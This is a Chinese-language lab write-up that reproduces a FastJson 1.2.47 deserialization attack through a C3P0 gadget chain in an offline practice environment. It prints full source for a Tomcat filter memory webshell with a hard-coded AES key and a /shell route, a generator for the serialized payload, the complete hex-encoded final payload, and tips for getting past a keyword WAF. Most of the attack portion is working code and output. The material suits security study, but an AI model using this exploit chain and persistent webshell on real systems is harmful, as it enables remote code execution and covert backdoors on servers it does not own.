漏洞利用#
參考:https://github.com/lemono0/FastJsonParty/blob/main/1247-waf-c3p0/write-up.md
主打一個過程復現,理解漏洞利用流程,網上很多大佬的文章,文章寫得很好,但作為基礎學習還是不夠(特別是用 idea 編譯 java 文件,如何解決依賴等基礎問題,-__-|.),所以就把自己復現過程的流程寫下。
抓登錄處的包
{
"@type": "java.lang.AutoCloseable"
1.2.47 存在 mappings 快取通殺繞過,通過 JNDI 進行利用,JNDI 的利用條件:
1、一般需要出網環境
2、受到 JDK 版本限制
此環境就不出網,所以無法通過 JNDI 利用
所以針對此環境,需要先探測依賴,利用 Character 轉換報錯可以判斷存在何種依賴。
{
"x": {
"@type": "java.lang.Character"{
"@type": "java.lang.Class",
"val": "org.springframework.web.bind.annotation.RequestMapping"
}
}
RequestMapping 本身為 SpringBoot 下的類,當存在該類時會報出類型轉換錯誤,說明為 SpringBoot 項目
否則,無法顯示
測試後,服務中存在 C3P0 依賴
{
"x": {
"@type": "java.lang.Character"{
"@type": "java.lang.Class",
"val": "com.mchange.v2.c3p0.DataSources"
}
}
FastJson 本身結合 C3P0 有很多利用方式,其中提的最多的是不出網利用,hex base 二次反序列化打內存馬。
找一個 filter 型的內存馬,java 文件內容如下:
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.apache.catalina.Context;
import org.apache.catalina.core.ApplicationFilterConfig;
import org.apache.catalina.core.StandardContext;
import org.apache.catalina.loader.WebappClassLoaderBase;
import org.apache.tomcat.util.descriptor.web.FilterDef;
import org.apache.tomcat.util.descriptor.web.FilterMap;
import sun.misc.BASE64Decoder;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import javax.servlet.*;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
public class IceShell extends AbstractTranslet implements Filter {
private final String pa = "3ad2fddfe8bad8e6";
public IceShell() {
}
public void init(FilterConfig filterConfig) throws ServletException {
}
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
HttpServletRequest request = (HttpServletRequest)servletRequest;
HttpServletResponse response = (HttpServletResponse)servletResponse;
HttpSession session = request.getSession();
Map<String, Object> pageContext = new HashMap();
pageContext.put("session", session);
pageContext.put("request", request);
pageContext.put("response", response);
ClassLoader cl = Thread.currentThread().getContextClassLoader();
if (request.getMethod().equals("POST")) {
Class Lclass;
if (cl.getClass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
Lclass = cl.getClass().getSuperclass();
this.RushThere(Lclass, cl, session, request, pageContext);
} else if (cl.getClass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
Lclass = cl.getClass().getSuperclass().getSuperclass();
this.RushThere(Lclass, cl, session, request, pageContext);
} else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass();
this.RushThere(Lclass, cl, session, request, pageContext);
} else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
this.RushThere(Lclass, cl, session, request, pageContext);
} else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
this.RushThere(Lclass, cl, session, request, pageContext);
} else {
Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
this.RushThere(Lclass, cl, session, request, pageContext);
}
filterChain.doFilter(servletRequest, servletResponse);
}
}
public void destroy() {
}
public void RushThere(Class Lclass, ClassLoader cl, HttpSession session, HttpServletRequest request, Map<String, Object> pageContext) {
byte[] bytecode = Base64.getDecoder().decode("yv66vgAAADQAGgoABAAUCgAEABUHABYHABcBAAY8aW5pdD4BABooTGphdmEvbGFuZy9DbGFzc0xvYWRlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADTFU7AQABYwEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQABZwEAFShbQilMamF2YS9sYW5nL0NsYXNzOwEAAWIBAAJbQgEAClNvdXJjZUZpbGUBAAZVLmphdmEMAAUABgwAGAAZAQABVQEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAC2RlZmluZUNsYXNzAQAXKFtCSUkpTGphdmEvbGFuZy9DbGFzczsAIQADAAQAAAAAAAIAAAAFAAYAAQAHAAAAOgACAAIAAAAGKiu3AAGxAAAAAgAIAAAABgABAAAAAgAJAAAAFgACAAAABgAKAAsAAAAAAAYADAANAAEAAQAOAA8AAQAHAAAAPQAEAAIAAAAJKisDK763AAKwAAAAAgAIAAAABgABAAAAAwAJAAAAFgACAAAACQAKAAsAAAAAAAkAEAARAAEAAQASAAAAAgAT");
try {
Method define = Lclass.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
define.setAccessible(true);
Class uclass = null;
try {
uclass = cl.loadClass("U");
} catch (ClassNotFoundException var18) {
uclass = (Class)define.invoke(cl, bytecode, 0, bytecode.length);
}
Constructor constructor = uclass.getDeclaredConstructor(ClassLoader.class);
constructor.setAccessible(true);
Object u = constructor.newInstance(this.getClass().getClassLoader());
Method Um = uclass.getDeclaredMethod("g", byte[].class);
Um.setAccessible(true);
String k = "3ad2fddfe8bad8e6";
session.setAttribute("u", k);
Cipher c = Cipher.getInstance("AES");
c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
byte[] eClassBytes = c.doFinal((new BASE64Decoder()).decodeBuffer(request.getReader().readLine()));
Class eclass = (Class)Um.invoke(u, eClassBytes);
Object a = eclass.newInstance();
Method b = eclass.getDeclaredMethod("equals", Object.class);
b.setAccessible(true);
b.invoke(a, pageContext);
} catch (Exception var19) {
}
}
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
static {
try {
String name = "AutomneGreet";
WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase)Thread.currentThread().getContextClassLoader();
StandardContext standardContext = (StandardContext)webappClassLoaderBase.getResources().getContext();
Field Configs = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("filterConfigs");
Configs.setAccessible(true);
Map filterConfigs = (Map)Configs.get(standardContext);
if (filterConfigs.get("AutomneGreet") == null) {
Filter filter = new IceShell();
FilterDef filterDef = new FilterDef();
filterDef.setFilter(filter);
filterDef.setFilterName("AutomneGreet");
filterDef.setFilterClass(filter.getClass().getName());
standardContext.addFilterDef(filterDef);
FilterMap filterMap = new FilterMap();
filterMap.addURLPattern("/shell");
filterMap.setFilterName("AutomneGreet");
filterMap.setDispatcher(DispatcherType.REQUEST.name());
standardContext.addFilterMapBefore(filterMap);
Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
constructor.setAccessible(true);
ApplicationFilterConfig filterConfig = (ApplicationFilterConfig)constructor.newInstance(standardContext, filterDef);
filterConfigs.put("AutomneGreet", filterConfig);
}
} catch (Exception var10) {
}
}
}
編譯生成 class 文件
正常來說可以通過 javac IceShell.java 進行編譯,但是這樣會報一堆錯誤,缺少各種依賴,那麼可以使用 idea 進行編譯,編譯生成的文件為 IceShell.class 文件,參考後續文章編譯內容。
上述 IceShell 文件是內存馬,接下來需要 C3P0 的反序列化鏈。
C3P0 鏈最終內容如下:
import com.alibaba.fastjson.JSONArray;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javax.management.BadAttributeValueExpException;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
public class Test {
public static void main(String[] args) throws Exception {
String hex2 = bytesToHex(tobyteArray(gen()));
String FJ1247 = "{\n" +
" \"a\":{\n" +
" \"@type\":\"java.lang.Class\",\n" +
" \"val\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\"\n" +
" },\n" +
" \"b\":{\n" +
" \"@type\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",\n" +
" \"userOverridesAsString\":\"HexAsciiSerializedMap:" + hex2 + ";\",\n" +
" }\n" +
"}\n";
System.out.println(FJ1247);
}
//FastJson原生反序列化加載惡意類字節碼
public static Object gen() throws Exception {
TemplatesImpl templates = TemplatesImpl.class.newInstance();
byte[] bytes = Files.readAllBytes(Paths.get("/Users/xxx/pentesting/javasec/FRain/out/production/FRain/IceShell.class")); //剛才做好的內存馬,讀取其中字節即可
setValue(templates, "_bytecodes", new byte[][]{bytes});
setValue(templates, "_name", "1");
setValue(templates, "_tfactory", null);
JSONArray jsonArray = new JSONArray();
jsonArray.add(templates);
BadAttributeValueExpException bd = new BadAttributeValueExpException(null);
setValue(bd,"val",jsonArray);
HashMap hashMap = new HashMap();
hashMap.put(templates,bd);
return hashMap;
}
public static void setValue(Object obj, String name, Object value) throws Exception{
Field field = obj.getClass().getDeclaredField(name);
field.setAccessible(true);
field.set(obj, value);
}
//將類序列化為字節數組
public static byte[] tobyteArray(Object o) throws IOException {
ByteArrayOutputStream bao = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(bao);
oos.writeObject(o); //
return bao.toByteArray();
}
//字節數組轉十六進制
public static String bytesToHex(byte[] bytes) {
StringBuffer stringBuffer = new StringBuffer();
for (int i = 0; i < bytes.length; i++) {
String hex = Integer.toHexString(bytes[i] & 0xff); //bytes[]中為帶符號字節-255~+255,&0xff: 保證得到的數據在0~255之間
if (hex.length()<2){
stringBuffer.append("0" + hex); //0-9 則在前面加‘0’,保證2位避免後面讀取錯誤
}else {
stringBuffer.append(hex);
}
}
return stringBuffer.toString();
}
}
同樣,在 src 中新建一個 Test.java 文件,同樣的方式解決依賴問題,然後右鍵運行此文件
輸出如下字符:
也就是最終的 payload
{
"a":{
"@type":"java.lang.Class",
"val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"
},
"b":{
"@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource",
"userOverridesAsString":"HexAsciiSerializedMap:aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d657400124c6a6176612f6c616e672f537472696e673b4c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000001757200025b42acf317f8060854e00200007870000024dccafebabe0000003401870a005e00cb0800cc09004b00cd0700ce0700cf0b000400d00700d10a000700cb08007e0b004900d208007a08007c0a00d300d40a00d300d50b000400d60800d70a00d800d90a002400da0a001c00db0a001c00dc0800dd0a004b00de0b00df00e00a00e100e20800e30a00e400e50800e60700e70700a30900e800e90a001c00ea0a00eb00ec0800ed0a002700ee0700ef0700f00a00e800f10a00eb00f20700f30a001c00f40a00f500ec0a001c00f60a00f500f70800f808009c0b00f900fa0800fb0a00fc00fd0700fe0a00d800ff0a003101000a00fc01010701020a003500cb0b000401030a010401050a003501060a00fc01070a001c010808010907010a08010b07010c0a003f010d0b010e010f0701100801110a001c01120800c80a001c01130a011400ec0a011401150701160b004901150701170a004b00cb0701180a004d00cb0a004d01190a004d011a0a004d011b0a0042011c07011d0a005300cb08011e0a0053011f0a0053011a09012001210a012001220a005301230a0042012407012507012607012707012801000270610100124c6a6176612f6c616e672f537472696e673b01000d436f6e7374616e7456616c75650100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301000a4c4963655368656c6c3b010004696e697401001f284c6a617661782f736572766c65742f46696c746572436f6e6669673b295601000c66696c746572436f6e66696701001c4c6a617661782f736572766c65742f46696c746572436f6e6669673b01000a457863657074696f6e73070129010008646f46696c74657201005b284c6a617661782f736572766c65742f536572766c6574526571756573743b4c6a617661782f736572766c65742f536572766c6574526573706f6e73653b4c6a617661782f736572766c65742f46696c746572436861696e3b29560100064c636c6173730100114c6a6176612f6c616e672f436c6173733b01000e736572766c65745265717565737401001e4c6a617661782f736572766c65742f536572766c6574526571756573743b01000f736572766c6574526573706f6e736501001b4c6a617661782f736572766c65742f46696c746572436861696e01001e6a617661782f736572766c65742f687474702f4874747053657373696f6e0100136a6176612f696f2f494f457863657074696f6e0100186a6176612f6c616e672f7265666c6563742f4d6574686f643b010007726571756573740100274c6a617661782f736572766c65742f687474702f4874747053657373696f6e3b010008726573706f6e73650100284c6a617661782f736572766c65742f687474702f48747470536572766c6574526571756573743b01000773657373696f6e0100204c6a617661782f736572766c65742f687474702f4874747053657373696f6e3b01000b70616765436f6e7465787401000f4c6a6176612f7574696c2f4d61703b010002636c0100174c6a6176612f6c616e672f436c6173734c6f616465723b0100164c6f63616c5661726961626c65547970655461626c650100354c6a6176612f7574696c2f4d61703c4c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f4f626a6563743b3e3b01000d537461636b4d61705461626c6507011707012a07012b07012c0700ce0700cf07012d0701160700f30700e707012e01000764657374726f79010009527573685468657265010081284c6a6176612f6c616e672f436c6173733b4c6a6176612f6c616e672f436c6173734c6f616465723b4c6a617661782f736572766c65742f687474702f4874747053657373696f6e3b4c6a617661782f736572766c65742f687474702f48747470536572766c6574526571756573743b4c6a617661782f736572766c65742f46696c746572436861696e3b295601000576617231380100224c6a6176612f6c616e672f436c6173734e6f74466f756e64457863657074696f6e0100106a6176612f6c616e672f4f626a6563740c015301540c015501560100156a6176612f6c616e672f436c6173734c6f616465720c015701580701590c015a01390c015b015c0100016707012d0c015d015e01000341455307015f0c0160016101001f6a617661782f63727970746f2f737065632f5365637265744b6579537065630c016201630c006301640c006a016501001673756e2f6d6973632f4241534536344465636f6465720c016601670701680c0169013b0c016a014a0c016b016c0c015b016d010006657175616c730100136a6176612f6c616e672f457863657074696f6e01000c4175746f6d6e6547726565740100306f72672f6170616368652f636174616c696e612f6c6f616465722f576562617070436c6173734c6f61646572426173650c016e016f0701700c017101720100286f72672f6170616368652f636174616c696e612f636f72652f5374616e64617264436f6e746578740100286f72672e6170616368652e636174616c696e612e636f72652e5374616e64617264436f6e746578740c017301520c017401750701760c0177017801000d6a6176612f7574696c2f4d61700100084963655368656c6c01002f6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724465660c0179017a0c017b017c0c017d017c0c017e017f01002f6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724d61700100062f7368656c6c0c0180017c0701810c018201830c00c1013b0c0184017c0c018501860100306f72672f6170616368652f636174616c696e612f636f72652f4170706c69636174696f6e46696c746572436f6e66696701001b6f72672f6170616368652f636174616c696e612f436f6e74657874010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100146a617661782f736572766c65742f46696c74657201001e6a617661782f736572766c65742f536572766c6574457863657074696f6e01001c6a617661782f736572766c65742f536572766c65745265717565737401001d6a617661782f736572766c65742f536572766c6574526573706f6e73650100196a617661782f736572766c65742f46696c746572436861696e01001e6a617661782f736572766c65742f687474702f4874747053657373696f6e0100136a6176612f696f2f494f457863657074696f6e0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e01000a67657453657373696f6e01002228294c6a617661782f736572766c65742f687474702f4874747053657373696f6e3b010003707574010038284c6a6176612f6c616e672f4f626a6563743b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010015676574436f6e74657874436c6173734c6f6164657201001928294c6a6176612f6c616e672f436c6173734c6f616465723b0100096765744d6574686f6401001428294c6a6176612f6c616e672f537472696e673b0100106a6176612f6c616e672f537472696e67010015284c6a6176612f6c616e672f4f626a6563743b295a010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b01000d6765745375706572636c6173730100076765744e616d65010040284c6a617661782f736572766c65742f536572766c6574526571756573743b4c6a617661782f736572766c65742f536572766c6574526573706f6e73653b29560100106a6176612f7574696c2f42617365363401000a6765744465636f6465720100074465636f64657201000c496e6e6572436c617373657301001c28294c6a6176612f7574696c2f426173653634244465636f6465723b0100186a6176612f7574696c2f426173653634244465636f6465720100066465636f6465010016284c6a6176612f6c616e672f537472696e673b295b420100116a6176612f6c616e672f496e7465676572010004545950450100116765744465636c617265644d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b01000d73657441636365737369626c65010004285a29560100096c6f6164436c617373010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b01000776616c75654f660100162849294c6a6176612f6c616e672f496e74656765723b010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100166765744465636c61726564436f6e7374727563746f72010033285b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f436f6e7374727563746f723b01001d6a6176612f6c616e672f7265666c6563742f436f6e7374727563746f7201000e676574436c6173734c6f6164657201000b6e6577496e7374616e6365010027285b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b01000c736574417474726962757465010027284c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f4f626a6563743b29560100136a617661782f63727970746f2f43697068657201000b676574496e7374616e6365010029284c6a6176612f6c616e672f537472696e673b294c6a617661782f63727970746f2f4369706865723b010008676574427974657301000428295b42010017285b424c6a6176612f6c616e672f537472696e673b295601001728494c6a6176612f73656375726974792f4b65793b295601000967657452656164657201001a28294c6a6176612f696f2f42756666657265645265616465723b0100166a6176612f696f2f4275666665726564526561646572010008726561644c696e6501000c6465636f6465427566666572010007646f46696e616c010006285b42295b4201001428294c6a6176612f6c616e672f4f626a6563743b01000c6765745265736f757263657301002728294c6f72672f6170616368652f636174616c696e612f5765625265736f75726365526f6f743b0100236f72672f6170616368652f636174616c696e612f5765625265736f75726365526f6f7401000a676574436f6e7465787401001f28294c6f72672f6170616368652f636174616c696e612f436f6e746578743b010007666f724e616d650100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c64010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b01000973657446696c746572010019284c6a617661782f736572766c65742f46696c7465723b295601000d73657446696c7465724e616d65010015284c6a6176612f6c616e672f537472696e673b295601000e73657446696c746572436c61737301000c61646446696c746572446566010034284c6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724465663b295601000d61646455524c5061747465726e01001c6a617661782f736572766c65742f44697370617463686572547970650100075245515545535401001e4c6a617661782f736572766c65742f44697370617463686572547970653b01000d7365744469737061746368657201001261646446696c7465724d61704265666f7265010034284c6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724d61703b29560021004b005e0001005f0001001200600061000100620000000200020008000100630064000100650000003d000200010000000b2ab700012a1202b50003b10000000200660000000e00030000001f0004001d000a002000670000000c00010000000b0068006900000001006a006b00020065000000350000000200000001b10000000200660000000600010000002300670000001600020000000100680069000000000001006c006d0001006e000000040001006f00010070007100020065000003180006000a000001ab2bc000043a042cc000053a051904b9000601003a06bb000759b700083a07190712091906b9000a0300571907120b1904b9000a0300571907120c1905b9000a030057b8000db6000e3a081904b9000f01001210b600119901541908b60012b60013b600141215b6001199001e1908b60012b600133a092a19091908190619041907b60016a7011e1908b60012b60013b60013b600141215b600119900211908b60012b60013b600133a092a19091908190619041907b60016a700ea1908b60012b60013b60013b60013b600141215b600119900241908b60012b60013b60013b600133a092a19091908190619041907b60016a700b01908b60012b60013b60013b60013b60013b600141215b600119900271908b60012b60013b60013b60013b600133a092a19091908190619041907b60016a7002a1908b60012b60013b60013b60013b60013b60013b600141215b6001199002a1908b60012b60013b60013b60013b60013b600133a092a19091908190619041907b600162d2b2cb900170300b100000004006600000072001c0000002600060027000c002800150029001e002a002a002b0036002c0042002d004a002e00590030006c00310076003200870033009d003400aa003500bb003600d4003700e4003800f500390111003a0124003b0135003c0154003d016a003e017b00400194004101a2004401aa0047006700000098000f0076001100720073000900aa001100720073000900e4001100720073000901240011007200730009016a001100720073000901940016007200730009000001ab006800690000000001ab007400750001000001ab007600770002000001ab007800790003000601a5007a007b0004000c019f007c007d000500150196007e007f0006001e018d008000810007004a016100820083000800840000000c0001001e018d0080008500070086000000330007ff0087000907008707008807008907008a07008b07008c07008d07008e07008f000033393ffb0045fc0026070090fa0007006e0000000600020091006f000100920064000100650000002b0000000100000001b10000000200660000000600010000006f0067000000200003000000010068006900000000000100af00b000010000000100b100b20002006e00000004000100b3000100ad00b400020065000000490000000400000001b10000000200660000000600010000007200670000002a0004000000010068006900000000000100af00b000010000000100b500b600020000000100b700b80003006e00000004000100b3000800b9006400010065000001da0005000a000000de123e4bb8000db6000ec0003f4c2bb60040b900410100c000424d1243b800441245b600464e2d04b600472d2cb60048c000493a041904123eb9004a0200c7009cbb004b59b7004c3a05bb004d59b7004e3a0619061905b6004f1906123eb6005019061905b60012b60014b600512c1906b60052bb005359b700543a0719071255b600561907123eb600571907b20058b60059b6005a2c1907b6005b125c05bd001c5903125d535904124d53b600283a08190804b60029190805bd002459032c535904190653b6002bc0005c3a091904123e1909b9000a030057a700044bb10001000000d900dc003d000300660000006600190000007600030077000d0078001a00790025007a002a007b0034007c0040007d0049007e0052007f0059008000600081006d008200730083007c008400830085008a008600950087009b008800b0008900b6008a00cd008b00d9008e00dc008d00dd0090006700000066000a0049009000ba00bb00050052008700bc00bd0006007c005d00be00bf000700b00029009a009b000800cd000c006c00c00009000300d600c100610000000d00cc00c200c30001001a00bf00c400c50002002500b400c600c70003003400a500c80081000400860000000a0003fb00d9420700aa00000200c90000000200ca01460000000a000100e400e101450009707400013170770100787372002e6a617661782e6d616e6167656d656e742e42616441747472696275746556616c7565457870457863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176612f6c616e672f4f626a6563743b787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc4020000787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d65737361676571007e00055b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b787071007e0014707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd22390200007870000000027372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00054c000866696c654e616d6571007e00054c000a6d6574686f644e616d6571007e000578700000002774000454657374740009546573742e6a61766174000367656e7371007e00170000000f71007e001971007e001a7400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e00137872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000007704000000007871007e0023787372001e636f6d2e616c69626162612e666173746a736f6e2e4a534f4e417272617900000000000000010200014c00046c69737471007e001378707371007e00220000000177040000000171007e00077878;
}
}
有上述內容後,就可以進行利用了
直接發包,發現被攔了,過濾的 userOverridesAsString,嘗試 unicode、hex 編碼繞過依然不行。此環境在代碼中過濾了 \u,\x 等編碼前綴
使用 _ 或 + 處理關鍵字繞過,參考 淺談 Fastjson 繞 waf
成功打入冰蝎內存馬,密碼為:goautomne
Java 文件編譯#
文件 - 新建 - 項目
選擇 java 模塊,下一步
下一步,填寫項目名稱 FRain
點擊完成
回到主界面,在 src 目錄下,新建 IceShell.java 文件,右鍵 src- 新建 - 文件
拷貝上面 filter 內存馬的內容
如果缺少依賴則右鍵 src- 打開模塊設置
選擇庫,導入缺少的 jar 包即可
依賴解決後,就可以進行構建,選擇構建 - 重新編譯即可生成 IceShell.class 文件